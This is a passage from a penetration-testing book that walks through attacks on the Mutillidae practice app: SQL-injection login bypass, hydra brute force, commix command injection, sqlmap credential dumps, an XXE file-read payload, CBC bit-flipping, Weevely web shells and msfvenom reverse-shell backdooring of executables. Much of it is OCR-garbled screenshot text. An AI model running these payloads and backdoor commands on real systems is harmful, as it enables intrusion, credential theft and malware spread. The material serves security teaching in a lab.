| Error Mess | Name Password View Account? Please register here age |
|--------------------------|---|
| | Failure is always an option |
| Läse | 279. |
| Code | 0 |
| Filte | E. / Kenzy: https://www.billidec.clms.scs/mp.901/mm.micr.php. |
| Perioge | C) Lamophildocrowellingen classer/WySQUMendler.php on line 165. Given executing purry: CHRMECT_proxed 8 Grines 1884 Grines 1884 Grines You Have on three in your SQL syntax; check the mercal that corresponds to your ParistS stream version for the right syntax to use near '' AND parameter''' at line 1 "'AND parameter''' at line 1 Control synches 5.0.11-day - 2002000 - SDC: 15cfcr%1cfcad01120cream1d2cd01120074cobbe 1 host_bries 127.0.0.1 tim TCF/DP |
| |) [Lety: LELET = FRMy accounts letRi unergames' ON L-L' IND personned-' (N) [Surgetion] |
| Trace | <pre>## C:\vappVhtdocn\vatillides\classesUVySQ.Headler.php(352): TpSQ.Headler.idofsecuteQuery('SELECT * FROM a') #1 D:\vampVhtdocn\vatillides\classesUSQ.GeryTeadler.php(359): TpSQ.Headler.ieograteQuery('SELECT * FROM a') #2 D:\vampVhtdocn\vatillides\classesUSQ.GeryTeadler.php(359): TpSQ.Headler.ieograteQuery('SELECT * FROM a') #2 D:\vampVhtdocn\vatillides\classesUSQ.GeryTeadler.php(359): TpSQ.Headler.ieograteQuery('SELECT * FROM a') #2</pre> |
| Tinguotic Information | Error attempting to display over information |

The real strength of a proxy is its ability to intercept and modify commands. For this particular example, we'll use Mutillidae, the web application that we installed when building our virtual lab in **chapter 1**, *Goal-Based Penetration Testing*, to perform an attack is to bypass SQL injection authentication.

To launch this attack, ensure that Burp Proxy is configured to intercept communications by going to the Proxy tab and selecting the Intercept subtab. Make sure that Intercept is on, as shown in the next screenshot. When this is completed, open a browser window and access the Mutillidae logon page by entering <IP address>/mutillidae/index.php?page=login.php. Enter variables in the Name and Password fields, and then click on the Login button.

If you return to Burp Proxy, you will see that the information that the user entered into the form on the webpage was intercepted:

| Burp Int | ruder Repe | eater Wind | ow Help | | | | |
|---|---|---|--|--|--|--|----------------------------|
| Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decc |
| Interce | | history | WebSocke | ts history | Options | | |
| Rec | quest to http | ://192.168.0 | .120:80 | | | | |
| Forward | | Drop | | Intercept is | on | Action | |
| Raw | Params | Headers | Hex | | | | |
| Content Cache-C Origin: Upgrade User-Ag Content Accept: Referer Accept- Cookie: Connect | -Length: ontrol: : http:// -Insecur ent: Moz -Type: ay text/hts : http:/ Language showhing ion: clo | 55 max-age= 192.168. e-Request illa/5.0 pplication ml,applion /192.168 : en-US, ts=1; PH se | 0 0.120 ts: 1 (Windor on/x-ww cation/: .0.120/n en;q=0.: PSESSID | ws NT 6.1 w-form-ur xhtml+xml nutillida B =mje40olg | ; Win64; lencoded ,applicat e/index.pl 2fta7ms61 | x64) AppleW ion/xml;q=0 hp?page=log tll5rtaj7 | /ebKit).9,im ;in.pł |
| usernam | e=\$27&pa | ssword=\$ | 27&logi | n-php-sub | mit-butto | n=Login | |

Click on the Action button and select the Send to Intruder option. Open the main Intruder tab, and you will see four subtabs, Target, Positions, Payloads, and Options, as shown in the following screenshot:

| arget Arnov: | Spider | Scarew | Intruder | Repeater | Seguinter | Decoder | Company | Estender | Project options | User splices | Akrta | |
|---|---|--|---|---|--|---|-------------------------------------|-------------------------|--------------------|-----------------|------------------|------------------|
| 2 | 1 | | | | | | | | | | | |
| arget Postmen | Payload | is Optim | | | | | | | | | | |
| Pavioad Pr | octions | | | | | | | | | | | |
| Confours the | cosilions of | tere pavle | ada will be | merted into | the basis nector | at The attact | type determ | nes the unav | in which payloads | are assisted to | seviced posities | erm - nes halp t |
| | 1000 | 1050005 | 2011/02 | 00012525 | Service and | 74455503 | 005550.0 | 00.0000 | 10000 | 0.000000 | 20262 | 10-11003 |
| Associtype: | Saper | | | | | | | | | | | |
| Context-1 Cache-Com Grigin: In Upgrade-I Uras-Agen Context-T Accept: C Referen: 1 Accept-La Cookie: s Connectio | <pre>iength: 5 introl: as introl: //10 interre- nt: Homil fype: app set/html http://l ingnage ihouhints mt: close</pre> | 5 5 100.0 Bequiette 14/5 D 11 cut in , applic, 92.160.1 en-05.eu *11; Fi | -12d c: 1 (Windows a/s-www winay/du 0.120/ww a;q=0.8 RFs8551D) | WT E.1;) form-urler ml+sml, q rillidae/ ==================================== | finé4; 264 1000ed plication, Index phyPy <mark>(ChtaTesEl</mark>) | AppleWet 'mal:q=0.4 sag==logir lilleta]? | ikir/617.1 1. image/us 1. php | 5 (88791), kp,*/*;q* | like deako) G.G | Chrone/17.0 | 2697.133 | Safari/527 |

If you select Positions, you will see that five payload positions were identified from the intercepted information.

This attack will use Burp Proxy's sniper mode, which takes a single input from a list provided by the tester and sends this input to a single payload position at a time. For this example, we will target the username field, which we suspect is vulnerable based on the returned error message.

To define the payload position, we select the Payloads subtab:

| Target Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decode |
|---|--|--|---|--------------|----------------------------|-------------|
| 1 × 2 × | | | | | | |
| Target Positions | Paylo | ads Opti | ons | | | |
| 2 Payload S | ets | | | | | |
| You can defi | ne one or | more navioa | d sets The | number of na | vload sets dene | ends on th |
| r ou can den | | nore payloa | u acta. The | number of pa | yiodu sets uept | 21103 011 1 |
| Payload set: | 1 | | - | Payload cou | unt: <mark>5</mark> | |
| Davie ad two | (and a second | | - International | | 9920-222 | |
| Payload type | Simple | list | | Request co | unt: 30 | |
| Payload type | Simple | list | • | Request co | unt: 30 | |
| Payload type Payload C This payload Paste | Diptions (type lets y | Simple li you configur | st] e a simple lis | Request co | unt: 30 nat are used as | payloads |
| Payload type Payload C This payload Paste | Simple | Simple lin You configury - # | st] e a simple lis | Request co | unt: 30 | payloads |
| Payload type Payload C This payload Paste Load | byptions (type lets y admin' 1=1 1=1 | Simple II you configure - # | st] e a simple lis | Request co | unt: 30 | payloads |
| Payload type Payload C This payload Paste Load Remove | type lets y admin' admin' 1=1 1=1 1=1# | Iist Simple Ii vou configur - # | st] e a simple lis | Request co | unt: 30 lat are used as | payloads |
| Payload type Payload C This payload Paste Load Remove Clear | bptions [type lets y admin' 1=1 1=1 1=1# | iist Simple lii /ou configur - # | stj e a simple lis | Request co | unt: 30 | payloads |

To launch the attack, select Intruder from the top menu, and then select Start Attack. The proxy will iterate the word list against the selected payload positions as legitimate HTTP requests, and it will return the server's status codes.

As you can see in the following screenshot, most options produce a status code of 200 (request succeeded); however, some of the data returns a status code of 302 (request found; indicating that the requested resource is presently located under a different URI):

| Denute | ve columns | | | | | | |
|--------------|------------------|----------|---------|-------|---------|--------|---------|
| Results | Target Positions | Payloads | Options | | | | |
| Filter: Show | ving all items | | | | | | |
| Request | A Payload | | Status | Error | Timeout | Length | Con |
| 0 | | | 200 | | | 55815 | 100,000 |
| 1 | admin' - | | 200 | õ | õ | 55827 | |
| 2 | admin' # | | 302 | 1 0 | ā | 436 | |
| 3 | 1=1 | | 200 | Ō | ā | 55879 | |
| 4 | 1=1 | | 200 | õ | ā | 55883 | |
| 5 | 1=1# | | 200 | õ | õ | 55886 | |
| <u></u> | Bassansa | | | | | | |
| Request | Response | | | | | | |
| Request | Params Headers | Hex | | | | | |

username=admin'\$20#&password=\$27&login-php-submit-button=Login

The 302 status indicates successful attacks, and the data obtained can be used to successfully log in to the target site.

Unfortunately, this is too brief of an overview of Burp Proxy and its capabilities. The free version included with Kali will suffice for many testing tasks; however, serious testers (and attackers) should consider purchasing the commercial version that provides the option of an automated scanner with reporting capabilities and plugins for automating tasks.

Web crawling and directory bruteforce attacks

Web crawling is the process of getting specific information from websites using a bot or automated script. Kali provides the inbuilt applications to perform this activity. The benefit of web crawling is that it lets you scrape data without having to perform attacks manually, one by one.

Attackers can use WebSploit to perform the web scan and crawling, and also to analyze the web. For example, to identify the phpmyadmin on multiple sites, attackers can configure the WebSploit module by running WebSploit in the Terminal, typing use web/pma, setting the target host using set target victim, and running it, as shown in the following screenshot:

| wsf > use web | /pma |
|----------------|----------------------|
| wsf:PMA > sho | woptions |
| Options | Value |
| TARGET | http://google.com |
| wsf:PMA > set | target 192.168.0.120 |
| TARGET => 19 | 2.168.0.120 |
| [*] Your Targ | et : 192.168.0.120 |
| [*] Loading Pa | th List Please Wait |
| [/phpMyAdmin/ |] [404 Not Found] |
| [/phpmyadmin/ |] [403 Forbidden] |
| [/PMA/] [| 404 Not Found] |
| [/admin/] | [404 Not Found] |
| [/dbadmin/] . | [404 Not Found] |
| [/mysql/] | [404 Not Found] |
| [/myadmin/] . | [404 Not Found] |
| [/phpmyadmin2 | /] [404 Not Found] |
| [/phpMyAdmin2 | /] [404 Not Found] |

Attackers can also make use of OWASP, DirBuster, and other tools to perform the same actions.

Web service-specific vulnerability scanners

Vulnerability scanners are automated tools that crawl an application to identify the signatures of known vulnerabilities.

Kali comes with several different preinstalled vulnerability scanners; Penetration testers will typically use two or three comprehensive scanners against the same target to ensure valid results are obtained to achieve the goal of the test. Note that some vulnerability scanners also include an attack functionality.

Vulnerability scanners are mostly noisy, and are usually detected by the victim. However, scans frequently get ignored as part of regular background activity. In fact, some attackers have been known to launch large-scale scans against a target to camouflage the real attack, or to induce the defenders to disable detection systems to reduce the influx of reports that they have to manage.

Important vulnerability scanners include the following:

| Application | Description |
|-------------|--|
| Arachnid | An open source Ruby framework that analyzes HTTP responses received during scanning to validate responses and eliminate false positives. |
| GoLismero | A scanner that maps web applications and detects common vulnerabilities. The results are saved in TXT, CVS, HTML, and RAW formats. |
| | A Perl-based open source scanner that allows IDS evasion and user changes to scanned modules. This original web |

| Nikto | scanner is beginning to show its age, and is not as accurate as some of the more modern scanners. |
|-----------|--|
| Skipfish | A scanner that completes a recursive crawl and dictionary- based crawl to generate an interactive site map of the targeted website, annotated with the output from additional vulnerability scans. |
| Vega | A GUI-based open source vulnerability scanner. As it is written in Java, it is cross-platform (Linux, macOS, and Windows) and can be customized by the user. |
| w3af | A scanner that provides both a graphical and command-line interface to a comprehensive Python testing platform. It maps a target website and scans for vulnerabilities. This project has been acquired by Rapid7, so there will be closer integration with the Metasploit framework in the future. |
| Wapiti | A Python-based open source vulnerability scanner. |
| Webscarab | OWASP's Java-based framework for analyzing HTTP and HTTPS protocols. It can act as an intercepting proxy, a fuzzer, and a simple vulnerability scanner. |
| Webshag | A Python-based website crawler and scanner that can utilize complex IDS evasion. |
| | An advanced man-in-the-middle (MiTM) framework, useful |

Kali also includes some application-specific vulnerability scanners. For example, WPScan is used specifically against **WordPress CMS** applications.

Application-specific attacks

Application-specific attacks outnumber attacks against specific operating systems. When one considers the misconfigurations, vulnerabilities, and logic errors that can affect each online application, it is surprising that any application can be considered secure.

We will highlight some of the more important attacks against web services.

Brute-forcing access credentials

One of the most common initial attacks against a website or its services is a brute-force attack against the access authentication, guessing the username and password. This attack has a high success rate because users tend to select easyto-remember credentials or reuse credentials, and also because system administrators frequently don't control multiple access attempts.

Kali comes with hydra, a command-line tool, and hydra-gtk, which has a GUI interface. Both tools allow a tester to brute-force or iterate possible usernames and passwords against a specified service. Multiple communication protocols are supported, including FTP, FTPS, HTTP, HTTPS, ICQ, IRC, LDAP, MySQL, Oracle, POP3, pcAnywhere, SNMP, SSH, VNC, and others.

The following screenshot shows hydra using a brute-force attack to determine the access credentials on an HTTP page:

hydra -l admin -P passlist.txt 192.168.0.101 http-post-form "/mutillidae/index.php page= WootEkali:-/map78 Aydra -l admin -# passlist.txt 192.168.0.101 http-post-form '/mutillidae/index.php?page=login.php:userr mme="UHER*Apassword="PASS*Alogin-php submit-buttom=Login:Not Logged In" Bydra v8.6 (c) 2017 by van Bauser/THC - Flease do not use in military or secret service organizations, or for illegal purp mess. Bydra (http://www.thc.org/tho-hydra) starting at 2018-12-23 15:11:02 [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), <1 try per task [DATA] task 1 server automatic button=Login:Not Logged In [80] [http-post-form] host; 192.168.0.101 login: admin password: admingers 1 of 1 target automatically completed, 1 valid password frund Hydra (http://www.thc.org/tho-hydra) finished at 2018-12-23 15:11:18

Injection

In this section, we will explore common injection attacks that are exploited by attackers in general.

OS command injection using commix

Command injection exploiter (commix) is an automated tool written in Python that is pre-compiled in Kali Linux to perform various OS commands if the application is vulnerable to command injection. It allows attackers to inject into any specific vulnerable parts of the application, or even into an HTTP header.

commix also comes as an additional plugin in various penetration testing frameworks such as TrustedSec's **Penetration Testers Framework (PTF)** and OWASP's **Offensive Web Testing Framework (OWTF)**.

Attackers may use all the functionalities provided by commix by entering <code>commix -h</code> in the Terminal.

To simulate the exploit, execute the following command in the Terminal on the targeted vulnerable web server:

Commix -url=http://YourIP/mutillidae/index.php popupnotificationcode=5L5&page=dns-lookur

When commix tool is run against the vulnerable URL, Penetration testers should be able to see the progress of command execution on the target server and also be able to see which parameter is vulnerable. In the preceding scenario, target_host is the variable that was injectable using classic injection techniques, as shown in the following screenshot:



Once the injection is successful, attackers are able to run commands on the server, for example, dir to list all the files and folders, as shown in the following screenshot:

| g sema . | | - FR1 | 18.000 |
|---|---|---|--|
| Pseudo-Terminal (type '?' for available options) commin (or shall) > dir | | | |
| <pre>%i < muk/div>cgrs class="report-beader" style="text-align:left;">Default Server: UuKnown Address: Directory 12/15/2019 12/15/2019 12/15/2018 11/26/2018 12/15/2018 11/26/2018 11/26/2018 11/26/2018 11/26/2018 12/15/2018 11/26/2018 11/2</pre> | ::1 > //26/2018 (5/2018 12) /2018 12/ /18 11/2 /11/26/20 11/26/2018 | Volume V 11/24/20 11/26/2018 /15/2018 6/2018 11 2018 11/2 18 11/26/20 11/26/20 | olum 18 12/1 /26/ 6/20 2016 19 |
| commin (or shall) > dir c:\ | | | |
| <pre>% < sul<pre class="report-header" style="text-align:left:">Defailt Server: UnRnown Address: e Directory 11/07/2007 10/07/2007 10/07/2007 00/07/2007 00/07/2007 00/07/2007 00/07/2007 00/07/2007 00/07/</pre></pre> | ::1 > 1/07/2007 07/2007 (2007 12 | Volume V 11/07/2007 11/07/2007 /15/2018 | 61um 07 11 12/1 |
| commix (on shell) > ipconfig | | | |
| <pre>%i < nul<pre class="report-header" style="text-align:left:">Default Server: UnKnown Address: rmst Connection-specific Link-local IPv4 Submet Default Tunnel Media Connection-specific</pre></pre> | | Windows | sthe |
| commix (or shell) > whoani | | | |
| <pre>%i < mul<pre class="report-header" style="text-align:left;">Default Server: OnEnoon Address:</pre></pre> | 1011 B | nt | |
| commix (or shall) > | | | |
| | - | | and the |

SQL injection

The most common and exploitable vulnerability in websites is the injection vulnerability, which occurs when the victim site does not monitor user input, thereby allowing the attacker to interact with backend systems. An attacker can craft the input data to modify or steal content from a database, place an executable onto the server, or issue commands to the operating system.

One of the most useful tools for assessing SQL injection vulnerabilities is sqlmap, a Python tool that automates the reconnaissance and exploitation of Firebird, Microsoft SQL, MySQL (now called MariaDB), Oracle, PostgreSQL, Sybase, and SAP MaxDB databases.

We'll demonstrate an SQL injection attack against the Mutillidae database. The first step is to determine the web server, the backend database management system, and the available databases.

Launch a virtual machine, as described in **chapter 1**, *Goal-Based Penetration Testing*, and access the Mutillidae website. When this is completed, review the web pages to identify one that accepts user input (for example, the user login form that accepts a username and password from a remote user); these pages may be vulnerable to SQL injection.

Then, open Kali and from command prompt, enter the following (using the appropriate target IP address):

|root@kali:~# sqlmap -u 'http://192.168.75.129/mutillidae/index.php?page=user- info.php&

sqlmap will return data, as shown in the following screenshot:



The most likely database to store the application's data is the mutillidae database; therefore, we will check for all the tables of that database using the following command:

|root@kali:~# sqlmap -u "http://192.168.0.101/mutillidae/index.php?page=user-info.php&use

The data returned from executing that command is shown in the following screenshot:



Of all the tables that were enumerated, one was titled accounts. We will attempt to dump the data from this part of the table. If successful, the account credentials will allow us to return to the database if further SQL injection attacks fail.

To dump the credentials, use the following command:

| ataba able: 23 en | se: mutill accounts | ~# Sq⊥map -u | "nttp://1 | 92.168.0.101 | | ae/index.pnp?page=user-into.pnp&u |
|---|--|---|--|---|---|---|
| eid | wername | lestname | in_admin | persword | firstname | + mysignature |
| 1 2 4 5 6 7 8 9 10 11 12 13 14 16 17 18 9 20 21 22 22 | <pre>i admin i admin i admin i admin john i joreny i bryce i samural i jim i bobty i slaba i drevall i sootty i cal i sootty i</pre> | Administrator Crenshaw Pentest Druin Galbraith WTF Rome Bill Lion Evil Calipari Calipa | TRUE TRUE TRUE FALSE | adminpass somepassword monkey password sasword stripes lamaster53 SoSoccel NotTelling JollyRoger laCadeve | <pre>> System Adrian John Jereany Bryce Sanural Jim Bobby Blobby Blobh Dave Patohes Patohes Patohes Pater Captain James James</pre> | <pre>got root? got root? gomble Films Rock! i like the swell of comfunk di373 1337 speak i Love SANS Carving fools Garving fools Carving fools Garving fools Rome is burning Hank is my ded i am a super-cat Freparation H Gootty do C-A-T-5 Cats</pre> |
| 23 | ed. | Skoudie | PALGE | pentest | Bd. | Commandline RungPu asyone? |

Similar attacks can be used against the database to extract credit card numbers or other confidential information.

XML injection

Nowadays, there are plenty of applications using Extensible Markup Language (XML), which defines a set of rules for encoding documents that can be understood by both humans and machines. XML injection is a way to exploit the logic of an XML app or service by injecting unexpected messages into the XML structure or contents.

In this section, we will explore how to perform XML injection, and successfully gain access to the underlying operating system by exploiting the typical misconfigurations that are left by developers.

Follow these steps to identify whether an XML injection is possible or not:

1. Go to http:/Your IP/mutillidae/index.php?page=xml-validator.php, as shown in the following screenshot:



2. Check whether we are getting a valid response or not by entering the following in the form:

The previous code should display Hello as a response, as shown in the following screenshot:

| | Rome - Login/Logister - Toggle Hints - Shew Sopup | Hints Tought Security Enforce SSL Reset OS View Log View | | | | |
|-----------------------------|---|--|--|--|--|--|
| WASP 2017 * | XMI Validator | | | | | |
| WASP 2013 | Ame validator | | | | | |
| WASP 2010 * | Sack 🥞 Help Mel | | | | | |
| WASP 2007 🔹 👌 | | | | | | |
| ob Services 🕨 | Hints and videos | | | | | |
| IMLS * | | Please Enter XML to Validate | | | | |
| hers ! | Example | r: <somoxml><massage>Helio World</massage></somoxml> | | | | |
| connectation + | T | | | | | |
| esourcas 🕴 | XML | | | | | |
| Donate | ANALOP | | | | | |
| Want to Help7 | | | | | | |
| 300 | | Validates XML | | | | |
| 00 | -XML Submitted | | | | | |
| Video Tutorials | (DOCIVPI for [(1001177 Variable "bello" >]>(somesnl>(message:dVariable)(/sessage)(/somesnl> | | | | | |
| - | - Text Content Parsed From XML | | | | | |
| | hela | | | | | |
| and the state of the second | | | | | | |

- 3. If the server is responding without an error message, it might potentially be vulnerable to XML injection.
- 4. Now, we can create a payload by adding SYSTEM to the variable and calling a local file:

```
<!DOCTYPE foo [ <!ENTITY testref SYSTEM "file:///c:/windows/win.ini" > ]>
<somexml><message>&testref;</message></somexml>
```

If successful, you should be able to see the contents of the file that was called, as follows:


Attackers can potentially run a PowerShell exploit by gain direct access to the entire system.

Bit-flipping attack

The majority of attackers do not focus much on crypto-type attacks, as it is time consuming and requires significant computing power to crack the cipher text to extract meaningful information. But in some cases, the logic of the cryptography implemented can be understood easily.

In this section, we will explore bit-flipping attacks, which use **Cipher Block Chain** (**CBC**) to encrypt the given plaintext. In CBC, before you encrypt a block, the plaintext will be XOR'ed with the encrypted output of the previous block by creating a logical chain of blocks, as shown in the following screenshot:



In a nutshell, XOR compares two values, and returns true if they are different.

What is the potential attack scenario here? If anyone can XOR the plaintext block with the encrypted message from the previous block, what would be the XOR input for the first block? All you need is an initialization vector. Access mutillidae by navigating to OWASP 2017 > A1 - Injection (Other) > CBC bit

flipping:

http://192.168.0.101/mutillidae/index.php?page=view-user-privilege-level.php&iv=6bc24fc1

Testers should be able to land on the following page:

| | | OWASP Mu | tillidae II: | Keep Calm and P |
|-------------------------|---------------------|-------------------------|---------------------------------|--|
| | Versio | n: 2.6.75 Security Lev | el: 0 (Hosed) Hir | nts: Enabled (1 - Try easier) N |
| | Home Login/Register | Topple Hints Show Pop | up Hints Toggle Se | curity Enforce SSL : Reset DO V |
| WASP 2017 | | | View U | ser Privilege Level |
| WASP 2013 | 1 | 1000 | | oor in the generation |
| WASP 2016 | Sack | Generation Help Me! | | |
| WASP 2007 | | | | |
| leb Services | 4 | Hints and Videos | | |
| TML 5 | | | Us | ser Privilege Level |
| thers 🏴 | | | Application ID | A1B2 |
| ocumentation | | | User ID | 100 (Hint 0X31 0X30 0X30) |
| esources | | | Group ID | 100 (Hint 0X31 0X30 0X30) |
| Donate Want to Help? | | | Note You need to ma ''000 | : UID/GID "000" is root. ike User ID and Group ID equal t " to become root user. |
| Yas | | | Security level ' but is | 1 requires three times more wor not any harder to solve. |

As we can see, the current app user is running with User ID 100 and Group ID 100. You need to be user 000 in group 000 to become the highly privileged root user.

The only thing we need to manipulate is the IV

value, 6bc24fc1ab650b25b4114e93a98f1eba. As it is hexadecimal and 32 characters long, the length is 128 bits. We start assessing the initialization vector by splitting the value into two characters as a block and change the value in the URL by accessing them one by one:

- http://192.168.0.101/mutillidae/index.php?page=view-user-privilegelevel.php&iv=00c24fc1ab650b25b4114e93a98f1eba: No change to the User or Group ID
- http://192.168.0.101/mutillidae/index.php?page=view-user-privilegelevel.php&iv=6b**00**4fc1ab650b25b4114e93a98f1eba: No change to the User or Group

When we get to the fifth block, 6bc24fc100650b25b4114e93a98f1eba, we see a change in the User ID, as shown in the following screenshot:

| nutillidae/index.php?pag | e=view-user-privilege-lev | el.php8w=6bc24fc100550 | o25b4114e93a98f1eba | 4 8 |
|--------------------------|---------------------------|--------------------------------|---|----------|
| | OWASP N | Autillidae II: | Keep Calm and | l Pwn |
| Versio | n: 2.6.75 Security | Level: 0 (Hosed) Hi | nts: Enabled (1 - Try easier) | Not Lo |
| ome Login/Register | Toggle Hints Show | Popup Hints Toggle Se | curity Enforce SSL Reset D | B View L |
| (| | View U | lser Privilege Leve | |
| Back | 🔮 Help Mel | | | |
| - | Hints and Video | \$ | | |
| | | U | ser Privilege Level | |
| | | Application ID | A1B2 | |
| | | User ID | 000 (Hint: 0X9a 0X30 0X3 | 0) |
| | | Group ID | 100 (Hint: 0X31 0X30 0X30 |)) |
| | | Note You need to ma "000 | : UID/GID "000" is root. ake User ID and Group ID eq " to become root user. | ual to |
| | | Security level but is | 1 requires three times more not any harder to solve. | work |

Testers can utilize Python to generate the hex value for us, as shown here. We will XOR the value to give us the result, 000:

```
>>> print hex(0XAB ^ 0X31)
0x9a
>>> print hex(0X9A ^ 0X31)
0xab
>>> print hex(0X9A ^ 0X30)
0xaa
```

To become root user, both Group ID and User ID need to be 000, so we repeat the same on all the blocks until the value changes. Finally, we get the eighth block, 6bc24fc1ab650b14b4114e93a98f1eba, which changed the group ID; now, we do the same as we did for the User ID:

ID

```
root@kali:~# python
Type "help", "copyright", "credits" or "license" for more information
>>> print hex(0X25 ^ 0X31)
0x14
>>> print hex(0X14 ^ 0X30)
0x24
>>> exit()
```

This gives us the following key: 6bc24fc1aa650b24b4114e93a98f1eba. When you pass the IV with the new value, you should now gain access to the application with enhanced privileges, as shown in the following screenshot:

☆ 8



Maintaining access with web shells

Once a web server and its services have been compromised, it is important to ensure that secure access can be maintained. This is usually accomplished with the aid of a web shell, a small program that provides stealth backdoor access and allows the use of system commands to facilitate post-exploitation activities.

Kali comes with several web shells; here, we will use a popular PHP web shell called **Weevely**. For other technologies, attackers might refer to http://webshell-archive.org/.

We evely simulates a Telnet session and allows the tester or attacker to take advantage of more than 30 modules for post-exploitation tasks, including the following:

- Browsing the target filesystem
- File transfer to and from the compromised system
- Performing audits for common server misconfigurations
- Brute-forcing SQL accounts through the target system
- Spawning reverse TCP shells
- Executing commands on remote systems that have been compromised, even if PHP security restrictions have been applied

Finally, Weevely endeavors to hide communications in HTTP cookies to avoid detection. To create Weevely, issue the following command from the Command Prompt:

root@kali:~# weevely generate <password> <path>

This will create the filename.php file in the root directory of the path that you enter. The following screenshot provides instructions on how to run weevely:



Navigate to OWASP 2017 > A6 -security misconfiguration> unrestricted file upload. We will be exploiting the file upload vulnerability on mutillidae. Upload filename.php, which we created using weevely, to the website, as shown in the following screenshot:



To communicate with the web shell, issue the following command from the Command Prompt, ensuring that the target IP address, directory, and password variables are changed to reflect those of the compromised system:

root@kali:~# weevely http://<target IP address><directory> <password>

In the example shown in the following screenshot, we have verified that we are connected to the web shell using the whoami command (which identifies the current system):



The web shell can also be used to establish a reverse shell connection back to the tester, using either netcat or the Metasploit framework as the local listener. This can be utilized to attack further inside the network by escalating privileges horizontally and vertically.

Summary

In this chapter, we examined web apps and the user authorization services they provide from the perspective of an attacker. We applied the kill chain perspective to web applications and their services in order to understand the correct application of reconnaissance and vulnerability scanning.

Several different techniques were presented; we focused on the hacker's mindset while attacking a web application, and looked at the methodology used when penetration testing a web application. We learned how client-side proxies can be used to perform various different attacks, looked at tools to perform bruteforcing on websites, and covered OS-level commands through web applications.

We completed the chapter with an examination of a web shell specific to web services.

In chapter 8, *Client-Side Exploitation*, we will learn how to identify and attack client-side exploits that connect users to web services, and how to escalate privileges to achieve the objective.

Client-Side Exploitation

In this chapter, we will look at a workaround strategy to directly target the clientside applications. The user initiates the interaction with the client application, allowing attackers to take advantage of the existing trust that exists between the user and the application. The use of social engineering methodologies will enhance the success of client-side attacks.

Client-side attacks target systems that typically lack the security controls (especially firewalls and intrusion detection systems) found on enterprise systems. If these attacks are successful and persistent communication is established, the client device can be used to launch attacks if it is reattached to the target's network.

By the end of this chapter, you will have learned how to attack client-side applications using the following:

- Backdoor executable files
- Perform hostile script attacks (CScript, VBScript, and PowerShell)
- Utilize the Browser Exploitation Framework (BeEF)
- Equip the **Cross Site Scripting Framework** (**XSSF**) during penetration testing

Backdooring executable files

Backdooring is a method of bypassing normal security validation and maintaining persistent access to the system. The weakest link in any cyber espionage is the human factor. Attackers would typically utilize the latest known or unknown exploit to embed them into the trusted executable and distribute. In this section, we will deep dive into how one can leverage <code>msfvenom</code> to plant a backdoor in any executable.

msfvenom is a standalone payload generator using Metasploit msfpayload and msfencode. As of June 8, 2015, msfvenom has replaced msfpayload. In order to standardize the tool and make it more efficient for the penetration testers, this tool was introduced. It is installed by default in Kali Linux, and when you type msfvenom -h in the terminal, the following usage details must be displayed:

| rootika | iii a msfvence -h | | |
|-------------------|--------------------|-------------------------|---|
| MstVence | n - a Metasploit s | tandalone p | syload generator. |
| Also a : | replacement for ms | fpayload an | i malencode. |
| Usagel | /usr/bin/msfvences | [options] < | var=val> |
| Example | : /usr/bin/msfveno | a -p window | s/meterpreter/reverse_top LBDST= <ip> -f exe -o payload.exe</ip> |
| Options | | | |
| =1., | 11#t | <typa></typa> | List all modules for [type]. Types are: payloads, encoders, nops, platforms, a |
| ormats. | A11 | | |
| -p. | payload | <pre>cpeyload></pre> | Fayload to use (list payloads to list,list-options for arguments). Specif |
| I STOIN | for custom | | |
| | list-options | | List payload OvalueD's standard, advanced and evasion options |
| -#. | format | <format></format> | Output format (use list formats to list) |
| -6. | encoder | <encoder></encoder> | The encoder to use (use list encoders to list) |
| | mallest | | Generate the smallest possible payload using all available encoders |
| -a., | arch | <anch></anch> | The architecture to use forpayload andencoders (uselist erchs to list |
| | platform | <platform></platform> | The platform for payload (use list platforms to list) |
| -0, | out | <path></path> | Save the payload to a file |
| -b, | bad-ohans | t> | Characters to avoid example: '\x00\xff' |
| -n., | nepsled | <length></length> | Prepend a mopsied of (length) size on to the payload |
| | pad-nops | | Use nopsled size specified by -n <length> as the total payload size, thus perf</length> |
| a subtra | action to prepend | a nopsled of | f quantity (nops minus phyload length) |
| - 5 ., | space | <length></length> | The maximum size of the resulting payload |
| | encoder-space | <length></length> | The maximum size of the encoded payload (defaults to the -s value) |
| -1. | iterations | <count></count> | The number of times to encode the payload |
| -c., | add-code | <path></path> | Specify an additional win32 shellcode file to include |
| -x, | template | <path> <</path> | Specify a custom executable file to use as a template |
| -k., | keep | | Preserve thetemplate behaviour and inject the payload as a new thread |
| · - • | vax-iLamo | <value></value> | Specify a custom variable name to use for certain output formats |
| - in , | | <second></second> | The masher of seconds to wait when reading the payload from STDIN (default 30, |
| isable) | | | |
| -h. | help | | Show this message |

The following command will create a clone_file.exe with the reverse_tcp payload with your IP address:

msfvenom -p windows/meterpreter/reverse_tcp -k -x original_file.exe LHOST=[YOUR_IP] LPOF

Using the -p option allows the testers to select what payload they need to embed

the -k option. We will clone the behavior of the executable by creating another thread; in other words, it will clone the game and insert our reverse_tcp payload. The -x option copies the executable template with the same characteristics.

An example would be to download any portable game. In this case, we will use plink.exe to make game.exe, as shown in the following screenshot:



Attackers can utilize encoders to make the attack more efficient; in this case, we will use shikata_ga_nai with the following command:

|msfvenom -a x86 --platform windows -x clone_newFile.exe -k -p windows/meterpreter/revers

Finally, a encoded file with the right payload, architecture will be created as shown in the following screenshot:



Once the executable is ready, you can find different ways to deliver the file using social engineering techniques or ask the users to download directly from a location of your choice.

